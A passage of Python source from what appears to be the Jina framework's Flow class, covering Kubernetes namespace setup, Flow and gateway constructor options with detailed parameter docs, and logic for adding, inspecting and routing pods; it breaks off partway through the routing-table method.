_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_pod_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors. """
class _FlowK8sInfraResourcesManager:
def __init__(self, k8s_namespace: str, k8s_custom_resource_dir: Optional[str]):
self.k8s_namespace = k8s_namespace
self.k8s_custom_resource_dir = k8s_custom_resource_dir
self.namespace_created = False
def __enter__(self):
from ..peapods.pods.k8slib import kubernetes_tools, kubernetes_client
client = kubernetes_client.K8sClients().core_v1
list_namespaces = [
item.metadata.name for item in client.list_namespace().items
]
if self.k8s_namespace not in list_namespaces:
with JinaLogger(f'create_{self.k8s_namespace}') as logger:
logger.info(f'🏝️\tCreate Namespace "{self.k8s_namespace}"')
kubernetes_tools.create(
'namespace',
{'name': self.k8s_namespace},
logger=logger,
custom_resource_dir=self.k8s_custom_resource_dir,
)
self.namespace_created = True
def __exit__(self, exc_type, exc_val, exc_tb):
from ..peapods.pods.k8slib import kubernetes_client
if self.namespace_created:
client = kubernetes_client.K8sClients().core_v1
client.delete_namespace(name=self.k8s_namespace)
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
https: Optional[bool] = False,
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param https: If set, connect to gateway using https
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compress: Optional[str] = 'NONE',
compress_min_bytes: Optional[int] = 1024,
compress_min_ratio: Optional[float] = 1.1,
cors: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = True,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_public: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
port_ctrl: Optional[int] = None,
port_expose: Optional[int] = None,
port_in: Optional[int] = None,
port_out: Optional[int] = None,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCRuntime',
shards: Optional[int] = 1,
socket_in: Optional[str] = 'PULL_CONNECT',
socket_out: Optional[str] = 'PUSH_CONNECT',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compress: The compress algorithm used over the entire Flow.
Note that this is not necessarily effective,
it depends on the settings of `--compress-min-bytes` and `compress-min-ratio`
:param compress_min_bytes: The original message size must be larger than this number to trigger the compress algorithm, -1 means disable compression.
:param compress_min_ratio: The compression ratio (uncompressed_size/compressed_size) must be higher than this number to trigger the compress algorithm.
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pea do not wait on the Runtime when closing
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param description: The description of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposesprivate IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside ZEDRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
Note, `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee the success execution in the sequel flow. If something
is wrong in the upstream, it is hard to carry this exception and moving forward without any side-effect.
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_expose: The port that the gateway exposes for clients for GRPC connections.
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_out: The port for output data, default a random port between [49152, 65535]
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runs_in_docker: Informs a Pea that runs in a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key to be used in ssh login, default None. regular default ssh keys will be used without specifying this argument.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
:param static_routing_table: Defines if the routing table should be pre computed by the Flow. In this case it is statically defined for each Pod and not send on every data request. Can not be used in combination with external pods
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of kwargs arguments that will be passed to Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
static_routing_table: Optional[bool] = False,
uses: Optional[str] = None,
workspace: Optional[str] = './',
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect pods in the flow.
If `REMOVE` is given then all inspect pods are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param static_routing_table: Defines if the routing table should be pre computed by the Flow. In this case it is statically defined for each Pod and not send on every data request. Can not be used in combination with external pods
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._pod_nodes = OrderedDict() # type: Dict[str, Pod]
self._inspect_pods = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_pod = [
GATEWAY_NAME
] #: default first pod is gateway, will add when build()
self._update_args(args, **kwargs)
self.k8s_infrastructure_manager = None
if self.args.infrastructure == InfrastructureType.K8S:
self.k8s_infrastructure_manager = self._FlowK8sInfraResourcesManager(
k8s_namespace=self.args.name,
k8s_custom_resource_dir=getattr(
self.args, 'k8s_custom_resource_dir', None
),
)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from ..parsers.flow import set_flow_parser
from ..helper import ArgNamespace
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from .asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(op_flow, pod_name, endpoint, connect_to_last_pod=False) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_pod and connect_to_last_pod:
endpoint = [op_flow.last_pod]
else:
endpoint = []
if not isinstance(endpoint, (list, tuple)):
raise ValueError(f'endpoint={endpoint} is not parsable')
for s in endpoint:
if s == pod_name:
raise FlowTopologyError(
'the income/output of a pod can not be itself'
)
# if an endpoint is being inspected, then replace it with inspected Pod
endpoint = {op_flow._inspect_pods.get(ep, ep) for ep in endpoint}
return endpoint
@property
def last_pod(self):
"""Last pod
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_pod[-1]
@last_pod.setter
def last_pod(self, name: str):
"""
Set a Pod as the last Pod in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Pod
"""
if name not in self._pod_nodes:
raise FlowMissingPodError(f'{name} can not be found in this Flow')
if not self._last_changed_pod or name != self.last_pod:
self._last_changed_pod.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(self, needs, **kwargs):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port_expose=self.port_expose,
pod_role=PodRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
k8s_namespace=self.args.name,
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.k8s_namespace = self.args.name
args.connect_to_predecessor = False
args.noblock_on_start = True
self._pod_nodes[GATEWAY_NAME] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow, wait until all peas defined in **needs** completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name, needs=needs, pod_role=PodRoleType.JOIN, *args, **kwargs
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Pods so far and add a blocker to the Flow; wait until all handing peas completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_pods(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
# overload_inject_start_pod
@overload
def add(
self,
*,
connect_to_predecessor: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = False,
daemon: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
expose_public: Optional[bool] = False,
external: Optional[bool] = False,
force: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = None,
native: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
peas_hosts: Optional[List[str]] = None,
polling: Optional[str] = 'ANY',
port_ctrl: Optional[int] = None,
port_in: Optional[int] = None,
port_jinad: Optional[int] = 8000,
port_out: Optional[int] = None,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'ZEDRuntime',
scheduling: Optional[str] = 'LOAD_BALANCE',
shards: Optional[int] = 1,
socket_in: Optional[str] = 'PULL_BIND',
socket_out: Optional[str] = 'PUSH_BIND',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connect_to_predecessor: The head Pea of this Pod will connect to the TailPea of the predecessor Pod.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pea do not wait on the Runtime when closing
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to Docker SDK when starting the docker '
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in Docker image. when not set then the Docker image ENTRYPOINT takes effective.
:param env: The map of environment variables that are available inside runtime
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposesprivate IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param external: The Pod will be considered an external Pod that has been started independently from the Flow.This Pod will not be context managed by the Flow.
:param force: If set, always pull the latest Hub Executor bundle even it exists on local
:param gpus: This argument allows dockerized Jina executor discover local gpu devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside ZEDRuntime.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
Note, `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee the success execution in the sequel flow. If something
is wrong in the upstream, it is hard to carry this exception and moving forward without any side-effect.
:param peas_hosts: The hosts of the peas when shards greater than 1.
Peas will be evenly distributed among the hosts. By default,
peas are running on host provided by the argument ``host``
:param polling: The polling strategy of the Pod (when `shards>1`)
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param port_out: The port for output data, default a random port between [49152, 65535]
:param pull_latest: Pull the latest image before running
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runs_in_docker: Informs a Pea that runs in a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param scheduling: The strategy of scheduling workload among Peas
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key to be used in ssh login, default None. regular default ssh keys will be used without specifying this argument.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
:param static_routing_table: Defines if the routing table should be pre computed by the Flow. In this case it is statically defined for each Pod and not send on every data request. Can not be used in combination with external pods
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Pod has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only flatten structure is supported, which means if you upload `[./foo/a.py, ./foo/b.pp, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_after: The executor attached after the Peas described by --uses, typically used for receiving from all shards, accepted type follows `--uses`
:param uses_before: The executor attached after the Peas described by --uses, typically before sending to all shards, accepted type follows `--uses`
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split provided, then the basename of that directory will be mounted into container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_pod
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
pod_role: 'PodRoleType' = PodRoleType.POD,
**kwargs,
) -> 'Flow':
"""
Add a Pod to the current Flow object and return the new modified Flow object.
The attribute of the Pod can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Pod(s) that this Pod receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param pod_role: the role of the Pod, used for visualization and route planning
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:param kwargs: other keyword-value arguments that the Pod CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# pod naming logic
pod_name = kwargs.get('name', None)
if pod_name in op_flow._pod_nodes:
new_name = f'{pod_name}{len(op_flow._pod_nodes)}'
self.logger.debug(
f'"{pod_name}" is used in this Flow already! renamed it to "{new_name}"'
)
pod_name = new_name
if not pod_name:
pod_name = f'executor{len(op_flow._pod_nodes)}'
if not pod_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {pod_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, pod_name, needs, connect_to_last_pod=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
if key not in kwargs:
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Pod
kwargs.update(dict(name=pod_name, pod_role=pod_role, num_part=len(needs)))
parser = set_pod_parser()
if pod_role == PodRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# grpc data runtime does not support sharding at the moment
if (
args.grpc_data_requests
and kwargs.get('shards') is not None
and kwargs.get('shards', 1) > 1
and self.args.infrastructure != InfrastructureType.K8S
):
raise NotImplementedError("GRPC data runtime does not support sharding")
if args.grpc_data_requests and args.runtime_cls == 'ZEDRuntime':
args.runtime_cls = 'GRPCDataRuntime'
# pod workspace if not set then derive from flow workspace
args.workspace = os.path.abspath(args.workspace or self.workspace)
args.k8s_namespace = self.args.name
args.noblock_on_start = True
args.extra_search_paths = self.args.extra_search_paths
args.zmq_identity = None
# BACKWARDS COMPATIBILITY:
# We assume that this is used in a search Flow if replicas and shards are used
# Thus the polling type should be all
# But dont override any user provided polling
if args.replicas > 1 and args.shards > 1 and 'polling' not in kwargs:
args.polling = PollingType.ALL
op_flow._pod_nodes[pod_name] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
op_flow.last_pod = pod_name
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Pod in the Flow
Internally, it adds two Pods to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BasePod(_pass) -- Flow
|
-- PUB-SUB -- InspectPod (Hanging)
In this way, :class:`InspectPod` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Pod
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_pod = self.last_pod
op_flow = self.add(
name=name, needs=_last_pod, pod_role=PodRoleType.INSPECT, *args, **kwargs
)
# now remove uses and add an auxiliary Pod
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_pod,
pod_role=PodRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_pod by the auxiliary Pod
op_flow._inspect_pods[_last_pod] = op_flow.last_pod
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_pod: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Pods output into one Pod. When the Flow has no inspect Pod then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Pod
:param include_last_pod: if to include the last modified Pod in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [k for k, v in self._pod_nodes.items() if v.role == PodRoleType.INSPECT]
if needs:
if include_last_pod:
needs.append(self.last_pod)
return self.add(
name=name,
needs=needs,
pod_role=PodRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
def _get_gateway_target(self, prefix):
gateway_pod = self._pod_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_pod.head_host,
'port': gateway_pod.head_port_in,
'expected_parts': 0,
},
)
# TODO needs to be refactored - deployment should not be a dictionary. Related Ticket:
# https://github.com/jina-ai/jina/issues/3280
def _get_routing_table(self) -> RoutingTable:
graph = RoutingTable()
for pod_id, pod in self._pod_nodes.items():
if pod_id == GATEWAY_NAME:
deployment = pod.deployments[0]
graph.add_pod(
f'start-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
graph.add_pod(
f'end-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
else:
for deployment in pod.deployments:
graph.add_pod(
deployment['name'],
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
for end, pod in self._pod_nodes.items():
if end == GATEWAY_NAME:
